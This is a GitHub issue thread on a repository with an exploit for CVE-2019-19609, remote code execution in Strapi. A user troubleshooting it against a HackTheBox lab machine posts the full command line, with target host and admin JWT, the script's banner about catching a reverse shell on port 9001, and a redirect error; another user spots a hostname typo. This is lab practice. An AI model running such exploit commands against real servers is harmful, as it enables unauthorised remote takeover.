ebadfd / CVE-2019-19609

Strapi Framework Vulnerable to Remote Code Execution
MIT License
7 stars 1 forks source link

No shell to listener #1

Closed oceanhawk closed 3 years ago

oceanhawk commented 3 years ago

Hi,

so I am using the exploit on a hackthebox machine. When executing the script, this is shown:

Strapi Framework Vulnerable to Remote Code Execution - CVE-2019-19609 please set up a listener on port 9001 before running the script. you will get a shell to that listener

Traceback (most recent call last): File "/home/oceanhawk/CVE/CVE-2019-19609/exploit.py", line 30, in response = requests.post(url, headers=headers, data=data, verify=False) File "/usr/local/lib/python3.9/dist-packages/requests/api.py", line 119, in post return request('post', url, data=data, json=json, kwargs) File "/usr/local/lib/python3.9/dist-packages/requests/api.py", line 61, in request return session.request(method=method, url=url, kwargs) File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 530, in request resp = self.send(prep, **send_kwargs) File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 665, in send history = [resp for resp in gen] File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 665, in history = [resp for resp in gen] File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 166, in resolve_redirects raise TooManyRedirects('Exceeded {} redirects.'.format(self.max_redirects), response=resp) requests.exceptions.TooManyRedirects: Exceeded 30 redirects.

I get no shell to my listener on 9001.

The command I type is this:

python3 exploit.py api-prod.horizontal.htb lhost eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjM0NjUxMTc5LCJleHAiOjE2MzcyNDMxNzl9.h_EP9dFh_0qAIZU3lvl1SpVkkYlBY_nN45BGQ7ptIqw http://api-prod.horizontall.htb/

ebadfd commented 3 years ago

well the error says requests.exceptions.TooManyRedirects: Exceeded 30 redirects. i think its giving you some redirect. i cant help you much because that box is still live. sorry about that if you have anything send me a email

async-costelo commented 3 years ago

@oceanhawk rhost spelling is incorrect "api-prod.horizontal.htb" <- missing a letter l on horizontall

ebadfd commented 3 years ago

hope the issue is fixed :D thanks @async-costelo